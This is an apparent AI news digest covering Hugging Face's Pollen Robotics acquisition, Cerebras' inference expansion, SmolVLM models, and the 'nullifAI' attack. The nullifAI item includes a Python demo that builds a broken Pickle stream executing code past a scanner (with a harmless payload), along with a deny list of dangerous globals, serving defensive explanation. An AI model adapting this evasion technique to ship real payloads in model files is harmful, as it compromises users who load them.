News from the AI & ML world

DeeperML - #huggingface

@the-decoder.com //
Hugging Face, a leading open-source AI platform, has announced its acquisition of Pollen Robotics, a French startup specializing in robotics. This strategic move aims to expand open-source robotics efforts and make robotics more accessible through transparency and community-driven development. The acquisition includes Pollen’s humanoid robot Reachy 2, which Hugging Face plans to further develop as an open-source hardware and software platform. The company believes this initiative will lower technical barriers and accelerate innovation in the field, positioning open source as a vital solution to industry challenges.

Hugging Face's CEO, Clément Delangue, emphasizes the critical importance of transparency in robotics, particularly when dealing with physical systems interacting in real-world environments. Open-source frameworks, featuring publicly available code and hardware documentation, are seen as a means to build trust and foster collaboration within the robotics community. Pollen CEO Matthieu Lapeyre views the acquisition as an opportunity to make robotics more practical and accessible, offering a transparent, community-driven alternative to the proprietary approaches often adopted by large, well-funded companies in the sector.

Reachy 2 is already being utilized by various AI companies in research settings, demonstrating its capabilities in performing basic tasks such as picking up objects. Hugging Face intends to release detailed schematics, parts lists, and 3D models of Reachy 2, enabling developers to repair components or make custom modifications. By fostering an open and collaborative environment, Hugging Face hopes to counterbalance inflated expectations in the robotics sector, where public demonstrations often depict ideal scenarios, and unlock the full potential of AI-driven robotics for broader applications.

Recommended read:
References:
  • Analytics India Magazine: Hugging Face Acquires Pollen Robotics to Expand Open-Source Robotics Efforts
  • the-decoder.com: Hugging Face bets on open source to solve robotics' transparency problem
  • WIRED: Hugging Face acquires open source robot startup
  • Maginative: Hugging Face Steps Into Hardware With Pollen Robotics Acquisition
  • The Robot Report: Hugging Face bridges gap between AI and physical world with Pollen Robotics acquisition

Jaime Hampton@AIwire //
Cerebras Systems is expanding its role in AI inference with a new partnership with Hugging Face and the launch of six new AI datacenters across North America and Europe. The partnership with Hugging Face integrates Cerebras' inference capabilities into the Hugging Face Hub, granting access to the platform's five million developers. This integration allows developers to use Cerebras as their inference provider for models like Llama 3.3 70B, powered by the Cerebras CS-3 systems.

Cerebras is also launching six new AI inference datacenters located across North America and Europe. Once fully operational, these centers are expected to significantly increase Cerebras' capacity to handle high-speed inference workloads, supporting over 40 million Llama 70B tokens per second. The expansion includes facilities in Dallas, Minneapolis, Oklahoma City, Montreal, New York and France, with 85% of the total capacity located in the United States.

Recommended read:
References:
  • venturebeat.com: Cerebras just announced 6 new AI datacenters that process 40M tokens per second — and it could be bad news for Nvidia
  • AIwire: Cerebras Scales AI Inference with Hugging Face Partnership and Datacenter Expansion
  • THE DECODER: Nvidia rival Cerebras opens six data centers for rapid AI inference

karlo.zanki@reversinglabs.com (Karlo Zanki)@Blog (Main) //
Cybersecurity researchers have identified malicious machine learning (ML) models on Hugging Face, a popular platform for sharing and collaborating on ML projects. The models use a technique ReversingLabs has named "nullifAI", which relies on deliberately "broken" Pickle files to evade detection. It abuses Pickle serialization, which lets arbitrary Python code run while a model is being deserialized. The malicious models, which look like proof-of-concept uploads rather than finished tooling, were initially not flagged as unsafe by Picklescan, the scanner Hugging Face runs against uploaded models.

ReversingLabs found two such models on Hugging Face. Both were stored in PyTorch format, which is essentially a compressed Pickle file, but compressed with 7z instead of PyTorch's default ZIP, so torch.load() could not open them and Picklescan did not scan them as PyTorch models. In addition, the malicious opcodes sit at the start of the Pickle stream and the stream is corrupted after them: a scanner that parses the whole file before reporting fails on the corruption and reports nothing, while Python's pickle module executes opcodes sequentially and has already run the payload by the time it reaches the broken part. The payload in both cases was a platform-aware reverse shell that connects to a hard-coded IP address. Hugging Face's security team has since removed the models and improved Picklescan's detection capabilities.
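Both halves of that trick, sequential execution and a scanner that gives up on a malformed stream, can be reproduced without any malicious code. The following is an added example written for this digest, not code from ReversingLabs, Hugging Face or Picklescan. It hand-assembles a Pickle stream whose only payload sets an environment variable (the real models spawned a reverse shell), corrupts the stream after the REDUCE opcode, and compares a scanner that parses the whole stream before reporting with one that keeps every GLOBAL/STACK_GLOBAL reference it has already decoded. DANGEROUS_GLOBALS, DEMO_CODE and the function names are this example's own assumptions, not Picklescan's rule set; the 7z wrapper around the real models is left out because it concerns the archive, not the Pickle stream.

```python
import os
import pickle
import pickletools

# Globals whose presence in a pickle stream means code execution. Short
# illustrative list for this example, not Picklescan's actual rule set.
DANGEROUS_GLOBALS = {
    "builtins.exec", "builtins.eval", "builtins.__import__",
    "os.system", "os.popen", "posix.system",
    "subprocess.Popen", "subprocess.check_output", "socket.socket",
}

# Harmless stand-in for the payload (the real models carried a reverse shell):
# it only sets an environment variable so that execution can be observed.
DEMO_CODE = 'import os; os.environ["NULLIFAI_DEMO"] = "executed"'

# Constructed benign sample, an ordinary pickled dict, used as a control case.
BENIGN_SAMPLE = pickle.dumps({"weights": [0.25, 0.5, 1.0]})


def build_payload(broken: bool) -> bytes:
    """Hand-assemble a pickle stream that calls builtins.exec(DEMO_CODE).

    Opcodes in order:
      'c'  GLOBAL 'builtins exec'   push the exec function
      'V'  UNICODE DEMO_CODE        push its argument
      0x85 TUPLE1                   wrap the argument as a 1-tuple
      'R'  REDUCE                   call exec(DEMO_CODE)
    A well-formed stream then ends with STOP ('.'). The broken variant ends
    with 0xFF, which is not a valid opcode: the nullifAI trick.
    """
    stream = (
        b"cbuiltins\nexec\n"
        + b"V" + DEMO_CODE.encode("raw_unicode_escape") + b"\n"
        + b"\x85"
        + b"R"
    )
    return stream + (b"\xff" if broken else b".")


class ReduceToExec:
    """Object whose __reduce__ makes pickle.dumps emit the same exec call,
    here via protocol 4, which uses STACK_GLOBAL instead of GLOBAL."""

    def __reduce__(self):
        return (exec, (DEMO_CODE,))


def protocol4_payload() -> bytes:
    return pickle.dumps(ReduceToExec(), protocol=4)


def victim_load(data: bytes) -> dict:
    """Deserialize the way an unsuspecting loader would and record the outcome."""
    os.environ.pop("NULLIFAI_DEMO", None)
    error = None
    try:
        pickle.loads(data)
    except (pickle.UnpicklingError, EOFError, ValueError) as exc:
        error = type(exc).__name__
    return {"executed": os.environ.get("NULLIFAI_DEMO") == "executed",
            "error": error}


def _referenced_globals(ops) -> set:
    """Collect 'module.name' for GLOBAL and STACK_GLOBAL opcodes.

    STACK_GLOBAL takes module and name from the stack; tracking the last two
    pushed strings is a heuristic that ignores memo and stack manipulation.
    """
    found, strings = set(), []
    for opcode, arg, _pos in ops:
        if opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.add(f"{module}.{name}")
        elif opcode.name in ("STRING", "BINSTRING", "SHORT_BINSTRING",
                             "UNICODE", "BINUNICODE", "SHORT_BINUNICODE",
                             "BINUNICODE8"):
            strings.append(arg)
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.add(f"{strings[-2]}.{strings[-1]}")
    return found


def naive_scan(data: bytes):
    """Parse the whole stream first, then inspect. A malformed stream aborts
    the scan before anything is reported, so the caller sees no findings."""
    try:
        ops = list(pickletools.genops(data))
    except ValueError:
        return None
    return sorted(_referenced_globals(ops) & DANGEROUS_GLOBALS)


def streaming_scan(data: bytes) -> dict:
    """Inspect opcodes as they are decoded and keep what was seen when the
    stream breaks: the unpickler will have executed exactly those opcodes."""
    ops, malformed = [], False
    try:
        for op in pickletools.genops(data):
            ops.append(op)
    except ValueError:
        malformed = True
    dangerous = sorted(_referenced_globals(ops) & DANGEROUS_GLOBALS)
    verdict = "unsafe" if dangerous else ("suspicious" if malformed else "clean")
    return {"dangerous_imports": dangerous, "malformed": malformed,
            "verdict": verdict}


if __name__ == "__main__":
    for label, data in (("well-formed", build_payload(False)),
                        ("broken", build_payload(True)),
                        ("protocol 4", protocol4_payload()),
                        ("benign", BENIGN_SAMPLE)):
        print(label, victim_load(data), naive_scan(data), streaming_scan(data))
```

Running it shows that pickle.loads raises UnpicklingError on the broken stream only after exec has already run, and that the whole-stream scanner returns nothing for exactly that file while the streaming scanner still flags builtins.exec and notes the malformation. On the consuming side the durable fix is not a better scanner but not executing opcodes at all: load untrusted checkpoints with torch.load(..., weights_only=True), which restricts unpickling to an allowlist of tensor-related types, or prefer Safetensors, which is not a Pickle format.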

Recommended read:
References:
  • Blog (Main): Researchers from ReversingLabs recently discovered two Hugging Face models containing malicious code. The nullifAI attack involves abusing Pickle file serialization.
  • gbhackers.com: Developers Beware! Malicious ML Models Found on Hugging Face Platform
  • The Hacker News: Malicious ML Models on Hugging Face Leverage Broken Pickle Format to Evade Detection
  • www.csoonline.com: Attackers hide malicious code in Hugging Face AI model Pickle files
  • ciso2ciso.com: Malicious ML Models on Hugging Face Exploit Novel Attack Technique – Source: www.infosecurity-magazine.com
  • ciso2ciso.com: Security Week - Malicious AI Models on Hugging Face Exploit Novel Attack Technique
  • cyberscoop.com: Hugging Face platform continues to be plagued by vulnerable ‘pickles’
  • Anonymous: Cybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection.
  • Help Net Security: Researchers have spotted two machine learning (ML) models containing malicious code on Hugging Face Hub, the popular online repository for datasets and pre-trained models.
  • www.scworld.com: Security news about Hugging Face with malicious AI models
  • The abuse of Pickle, a popular Python module that many teams use for serializing and deserializing ML model data
  • Virus Bulletin: Virus Bulletin reports on researchers from ReversingLabs discovering two Hugging Face models containing malicious code.

@siliconangle.com //
Hugging Face has unveiled two new compact AI models, SmolVLM-256M and SmolVLM-500M, designed to analyze images, short videos, and text on devices with limited resources. These models, requiring less than 1GB of RAM, are intended for use in constrained environments where computational power is scarce, such as laptops with limited RAM. The models are not only small in size, but also in parameter count, with 256 million and 500 million parameters, respectively. The team states that they are ideal for developers looking to process large amounts of data very cheaply.

These new models can perform tasks like describing images or video clips and answering questions about PDFs, including scanned text and charts. Hugging Face used datasets called The Cauldron, a collection of 50 high-quality image and text datasets, and Docmatix, a set of file scans paired with detailed captions, to train SmolVLM-256M and SmolVLM-500M. The company also claims that SmolVLM-256M and SmolVLM-500M outperform the larger Idefics 80B model on benchmarks such as AI2D, which evaluates the ability to analyze science diagrams. The models are available on the web and for download with an Apache 2.0 license.

Recommended read:
References:
  • techcrunch.com: Hugging Face releases SmolVLM-256M and SmolVLM-500M, claiming they can analyze images, short videos, and text on "constrained devices" with under ~1GB of RAM (Kyle Wiggers/TechCrunch)
  • Techmeme: Hugging Face releases SmolVLM-256M and SmolVLM-500M, claiming they can analyze images, short videos, and text on "constrained devices" with under ~1GB of RAM
  • SiliconANGLE: Hugging Face open-sources world’s smallest vision language model